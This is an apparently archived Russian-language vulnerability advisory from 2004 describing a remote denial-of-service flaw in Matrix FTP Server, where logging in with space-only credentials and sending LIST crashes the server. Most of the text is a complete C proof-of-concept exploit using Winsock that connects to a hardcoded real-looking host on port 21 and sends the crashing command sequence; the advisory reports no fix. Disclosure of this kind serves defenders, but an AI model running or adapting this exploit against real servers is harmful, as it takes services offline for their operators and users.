Удаленный отказ в обслуживании против Matrix FTP Server
| Дата публикации: | 11.02.2004 |
| Всего просмотров: | 1369 |
| Опасность: | Средняя |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Matrix FTP Server
Описание: Уязвимость обнаружена в Matrix FTP Server. Удаленный пользователь может аварийно завершить работу FTp сервера. Удаленный пользователь может войти в систему со специально обработанным именем пользователя и паролем (4 пробела для имени пользователя и 4 пробела для пароля) и затем послать FTP LIST команду, чтобы аварийно завершить работу FTP сервера. Пример/Эксплоит:
//===========================================================
#include <winsock2.h>
#include "stdio.h"
#include "conio.h"
#pragma comment(lib, "ws2_32.lib")
void main()
WSADATA W;
SOCKET Sock;
struct sockaddr_in Saddr;
int res,err;
char text[1024]={' '};
err = WSAStartup( 0x101, &W );
if(err!=0) return;
Sock=socket(AF_INET,SOCK_STREAM,0);
Saddr.sin_family=AF_INET;
Saddr.sin_port=htons(21);
hostent *H=gethostbyname("ftp.fasthost.co.uk");
Saddr.sin_addr.s_addr= *((unsigned long *) H->h_addr);
printf("Connecting to server..\n");
res=connect(Sock,(sockaddr*)&Saddr,sizeof(Saddr));
if (res!=0) return;
res=recv(Sock,text,1024,0);
printf(text);
strcpy(text,"USER \r\n");
res=send(Sock,text,strlen(text),0);
printf(text);
res=recv(Sock,text,1024,0);
printf(text);
strcpy(text,"PASS \r\n");
res=send(Sock,text,strlen(text),0);
printf(text);
res=recv(Sock,text,1024,0);
printf(text);
strcpy(text,"LIST\r\n");
res=send(Sock,text,strlen(text),0);
printf(text);
res=recv(Sock,text,1024,0);
printf(text);
closesocket(Sock);
return;
URL производителя: http://www.matrix-servers.com/index.html Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | Matrix FTP Server" may be crashed after logining send LIST command. |